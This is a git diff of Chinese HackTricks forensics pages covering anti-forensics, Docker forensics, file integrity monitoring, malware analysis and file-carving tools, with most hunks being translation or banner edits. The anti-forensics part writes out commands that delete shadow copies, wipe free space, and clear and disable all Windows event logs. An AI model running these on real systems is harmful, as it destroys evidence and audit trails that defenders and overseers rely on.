`NtfsDisableLastAccessUpdate`。如果不存在,请添加此 DWORD 并将其值设置为 1,以禁用该过程。 4. 关闭注册表编辑器,并重新启动服务器。 ## 删除 USB 历史记录 -所有的**USB 设备条目**都存储在 Windows 注册表的 **USBSTOR** 注册表键下,其中包含子键,每当您将 USB 设备插入 PC 或笔记本电脑时就会创建。您可以在此处找到此键 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**删除**这个键将删除 USB 历史记录。\ +所有的 **USB 设备条目** 都存储在 Windows 注册表中的 **USBSTOR** 注册表键下,其中包含子键,每当您将 USB 设备插入 PC 或笔记本电脑时就会创建。您可以在此处找到此键 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**删除此** 将删除 USB 历史记录。\ 您也可以使用工具 [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) 来确保已删除它们(并删除它们)。 另一个保存有关 USB 的信息的文件是位于 `C:\Windows\INF` 内的文件 `setupapi.dev.log`。这也应该被删除。 ## 禁用阴影副本 -使用 `vssadmin list shadowstorage` 命令**列出**阴影副本\ -运行 `vssadmin delete shadow` 命令**删除**它们 +使用 `vssadmin list shadowstorage` **列出**阴影副本\ +运行 `vssadmin delete shadow` **删除**它们 您还可以通过 GUI 删除它们,按照 [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) 中提出的步骤进行操作。 要禁用阴影副本,请按照[此处的步骤](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -1. 通过在单击 Windows 启动按钮后输入“services”到文本搜索框中打开服务程序。 -2. 从列表中找到“Volume Shadow Copy”,选择它,然后通过右键单击访问属性。 -3. 从“启动类型”下拉菜单中选择“禁用”,然后通过单击“应用”和“确定”来确认更改。 +1. 通过在单击 Windows 启动按钮后的文本搜索框中键入 "services" 来打开服务程序。 +2. 从列表中找到 "Volume Shadow Copy",选择它,然后通过右键单击访问属性。 +3. 从 "启动类型" 下拉菜单中选择禁用,然后通过单击应用和确定来确认更改。 还可以在注册表 `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` 中修改要复制到阴影副本中的文件的配置。 ## 覆盖已删除的文件 -* 您可以使用一个**Windows 工具**:`cipher /w:C` 这将指示 cipher 从 C 驱动器中的可用未使用磁盘空间中删除任何数据。 -* 您还可以使用 [**Eraser**](https://eraser.heidi.ie) 等工具 +* 您可以使用一个 **Windows 工具**:`cipher /w:C` 这将指示 cipher 从 C 驱动器内的可用未使用磁盘空间中删除任何数据。 +* 您还可以使用类似 [**Eraser**](https://eraser.heidi.ie) 的工具 ## 删除 Windows 事件日志 -* Windows + R --> eventvwr.msc --> 展开“Windows 日志” --> 右键单击每个类别并选择“清除日志” +* Windows + R --> eventvwr.msc --> 展开 "Windows 日志" --> 右键单击每个类别,然后选择 "清除日志" * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` ## 禁用 Windows 事件日志 * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* 在服务部分内禁用服务“Windows 事件日志” +* 在服务部分内禁用服务 "Windows 事件日志" * `WEvtUtil.exec clear-log` 或 `WEvtUtil.exe cl` ## 禁用 $UsnJrnl @@ -169,16 +169,17 @@ NFTS使用一个簇和最小信息大小。这意味着如果一个文件占用 {% embed url="https://websec.nl/" %} +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) 上关注我们。 -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 7ce7ec293..c3ed75af6 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ # Docker取证 +{% hint style="success" %} +学习并实践AWS Hacking:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践GCP Hacking:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} ## 容器修改 @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -您可以轻松地使用以下命令查找有关此容器对镜像所做修改: +您可以使用以下命令轻松**查找对此容器所做的与镜像相关的修改**: ```bash docker diff wordpress C /var @@ -41,26 +42,26 @@ A /var/lib/mysql/mysql/general_log.CSV ```bash docker cp wordpress:/etc/shadow. ``` -您还可以通过运行一个新容器并从中提取文件来**与原始文件进行比较**: +你也可以通过运行一个新的容器并从中提取文件来**与原始文件进行比较**: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` -如果发现**添加了一些可疑文件**,您可以访问容器并进行检查: +如果发现**已添加一些可疑文件**,您可以访问容器并进行检查: ```bash docker exec -it wordpress bash ``` ## 图像修改 -当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来 **提取修改的摘要**: +当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来**提取修改的摘要**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -然后,您可以**解压**图像并**访问 blobs**,以搜索您在更改历史记录中发现的可疑文件: +然后,您可以**解压**图像并**访问** blobs 以搜索您在更改历史记录中发现的可疑文件: ```bash tar -xf image.tar ``` @@ -70,7 +71,7 @@ tar -xf image.tar ```bash docker inspect ``` -您还可以使用以下命令获取**更改历史记录摘要**: +您还可以使用以下命令获取**更改历史摘要**: ```bash docker history --no-trunc ``` @@ -90,9 +91,9 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -这使您能够**浏览Docker镜像的不同blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。 +这使您能够**浏览 Docker 镜像的不同 blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。 -使用die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\ +使用 die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\ 您可以从解压缩镜像的目录中解压缩图像的所有层,执行: ```bash tar -xf image.tar @@ -100,6 +101,21 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don ``` ## 从内存中获取凭据 -请注意,当您在主机内运行一个docker容器时,**您可以从主机上运行`ps -ef`命令来查看容器中运行的进程** +请注意,当您在主机内运行一个 Docker 容器时,**您可以通过在主机上运行 `ps -ef` 命令来查看容器中运行的进程** -因此(作为root用户)您可以从主机中**转储进程的内存**,并搜索凭据,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。 +因此(作为 root 用户)您可以从主机中**转储进程的内存**,并搜索**凭据**,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。 + +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 848f8828d..57dd2ac1a 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,30 +1,31 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # 基线 -基线包括对系统的某些部分进行快照,以便**将来与之进行比较以突出变化**。 +基线包括对系统的某些部分进行快照,以便与将来的状态进行比较以突出变化。 例如,您可以计算并存储文件系统中每个文件的哈希值,以便找出哪些文件已被修改。\ -还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物进行此操作。 +这也可以用于创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物。 ## 文件完整性监控 -文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护IT环境和数据。它包括两个关键步骤: +文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护 IT 环境和数据。它包括两个关键步骤: -1. **基线比较:** 使用文件属性或加密校验和(如MD5或SHA-2)建立基线,以便将来进行比较以检测修改。 +1. **基线比较:** 使用文件属性或加密校验和(如 MD5 或 SHA-2)建立基线,以便将来进行比较以检测修改。 2. **实时更改通知:** 当文件被访问或更改时立即收到警报,通常通过操作系统内核扩展。 ## 工具 @@ -32,21 +33,22 @@ * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# 参考资料 +## 参考资料 * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index fc04b15ed..20f74a227 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # 恶意软件分析 +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## 取证备忘单 @@ -36,8 +37,8 @@ sudo apt-get install -y yara ``` #### 准备规则 -使用此脚本从 github 下载并合并所有 yara 恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -创建 _**rules**_ 目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。 +使用此脚本从 github 下载并合并所有 yara 恶意软件规则: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +创建名为 _**rules**_ 的目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。 ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它会发现诸如Att\&ck战术或可疑功能,例如: +**Capa**检测可执行文件中的潜在恶意**功能**:PE、ELF、.NET。因此,它将查找诸如Att\&ck战术或可疑功能,例如: - 检查OutputDebugString错误 - 作为服务运行 @@ -80,14 +81,14 @@ clamscan folderpath #Scan the whole folder ### IOCs IOC表示威胁指标。IOC是一组**用于识别**一些潜在不受欢迎的软件或已确认**恶意软件**的条件。蓝队使用这种定义来在其**系统**和**网络**中**搜索此类恶意文件**。\ -共享这些定义非常有用,因为当在计算机中识别恶意软件并为该恶意软件创建IOC时,其他蓝队可以使用它更快地识别恶意软件。 +共享这些定义非常有用,因为当在计算机中识别出恶意软件并为该恶意软件创建了一个IOC时,其他蓝队可以使用它更快地识别出恶意软件。 -创建或修改IOC的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\ -您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOC**。 +创建或修改IOCs的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\ +您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOCs**。 ### Loki -[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描器。\ +[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描程序。\ 检测基于四种检测方法: ``` 1. File Name IOC @@ -104,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux 恶意软件检测 -[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的数据,使用 LMD 结账功能以及恶意软件社区资源。 +[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件并生成用于检测的签名。此外,威胁数据还来自用户提交的具有 LMD 结帐功能和恶意软件社区资源。 ### rkhunter @@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术在可执行文件中查找混淆的字符串。 +[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术来查找可执行文件中的混淆字符串。 ### PEpper @@ -122,23 +123,23 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEstudio -[PEstudio](https://www.winitor.com/download) 是一个工具,可以获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。 +[PEstudio](https://www.winitor.com/download) 是一个工具,允许获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并找到潜在的 Att\&ck 技术。 ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否加密,并查找打包程序。 +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否**加密**,还可以找到**打包程序**。 ### NeoPI -[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种统计方法来检测文本/脚本文件中混淆和加密内容的 Python 脚本。NeoPI 的预期目的是帮助检测隐藏的 Web shell 代码。 +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种**统计方法**来检测文本/脚本文件中的**混淆**和**加密**内容的 Python 脚本。NeoPI 的预期目的是帮助**检测隐藏的 Web shell 代码**。 ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测混淆/可疑代码以及使用 PHP 函数的文件,这些函数通常在恶意软件/webshell 中使用。 +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测**混淆**/**可疑代码**以及使用**经常用于** **恶意软件**/**Web shell** 的 **PHP** 函数的文件。 ### Apple 二进制签名 -在检查一些恶意软件样本时,您应始终检查二进制文件的签名,因为签署它的开发人员可能已与恶意软件相关联。 +在检查一些**恶意软件样本**时,您应始终检查二进制文件的签名,因为签名的**开发人员**可能已与**恶意软件**有关。 ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -157,7 +158,7 @@ spctl --assess --verbose /Applications/Safari.app ### 基线 -如果文件夹中的文件**不应该被修改**,你可以计算文件夹中**原始文件**的**哈希值**,并将其与**当前文件**进行**比较**。任何被修改的内容都会**引起怀疑**。 +如果文件夹的文件**不应该被修改**,你可以计算文件夹中**原始文件**的**哈希值**,并将其与**当前文件**进行**比较**。任何被修改的内容都会**引起怀疑**。 ### 统计分析 diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index bb550ba8d..145d4054e 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,28 +1,29 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
+{% endhint %} # 数据碎片重组工具 ## Autopsy -在取证中最常用的用于从图像中提取文件的工具是[**Autopsy**](https://www.autopsy.com/download/)。下载、安装并让其摄取文件以查找“隐藏”文件。请注意,Autopsy专为支持磁盘映像和其他类型的映像构建,而不是简单文件。 +在取证中用于从图像中提取文件的最常用工具是[**Autopsy**](https://www.autopsy.com/download/)。下载、安装并让其摄取文件以查找“隐藏”文件。请注意,Autopsy 专为支持磁盘映像和其他类型的映像构建,而不是简单文件。 ## Binwalk -**Binwalk**是一种用于搜索二进制文件(如图像和音频文件)中嵌入文件和数据的工具。 -可以使用`apt`安装,但是[源代码](https://github.com/ReFirmLabs/binwalk)可以在github上找到。 +**Binwalk** 是一种用于搜索二进制文件(如图像和音频文件)中嵌入文件和数据的工具。 +可以使用 `apt` 安装,但[源代码](https://github.com/ReFirmLabs/binwalk)可在 github 上找到。 **有用的命令**: ```bash sudo apt install binwalk #Insllation @@ -32,7 +33,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file ``` ## Foremost -另一个常用的查找隐藏文件的工具是**foremost**。您可以在`/etc/foremost.conf`中找到foremost的配置文件。如果您只想搜索一些特定文件,请取消注释。如果您不取消注释任何内容,foremost将搜索其默认配置的文件类型。 +另一个常用的查找隐藏文件的工具是 **foremost**。您可以在 `/etc/foremost.conf` 中找到 foremost 的配置文件。如果您只想搜索一些特定文件,请取消注释。如果您不取消任何注释,foremost 将搜索其默认配置的文件类型。 ```bash sudo apt-get install foremost foremost -v -i file.img -o output @@ -47,19 +48,19 @@ scalpel file.img -o output ``` ## Bulk Extractor -这个工具包含在kali中,但你也可以在这里找到它: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) +这个工具包含在kali中,但你也可以在这里找到它:[https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) -这个工具可以扫描一个镜像,并且会**提取其中的pcaps**,**网络信息(URLs, domains, IPs, MACs, mails)**以及更多**文件**。你只需要执行以下操作: +这个工具可以扫描一个镜像,并且会**提取其中的pcaps**,**网络信息(URLs、域名、IP地址、MAC地址、邮件)**以及更多**文件**。你只需要执行以下操作: ```text bulk_extractor memory.img -o out_folder ``` -浏览工具收集的**所有信息**(密码?),**分析**数据包(阅读[**Pcaps分析**](../pcap-inspection/)),搜索**奇怪的域名**(与**恶意软件**或**不存在**相关的域名)。 +浏览工具收集的**所有信息**(密码?),分析**数据包**(阅读[**Pcaps分析**](../pcap-inspection/)),搜索**奇怪的域名**(与**恶意软件**或**不存在**相关的域名)。 ## PhotoRec 您可以在[https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)找到它。 -它带有GUI和CLI版本。您可以选择要让PhotoRec搜索的**文件类型**。 +它带有GUI和CLI版本。您可以选择要PhotoRec搜索的**文件类型**。 ![](../../../.gitbook/assets/image%20%28524%29.png) @@ -74,4 +75,4 @@ bulk_extractor memory.img -o out_folder # 附加工具 您可以使用[**viu**](https://github.com/atanunq/viu)在终端中查看图像。 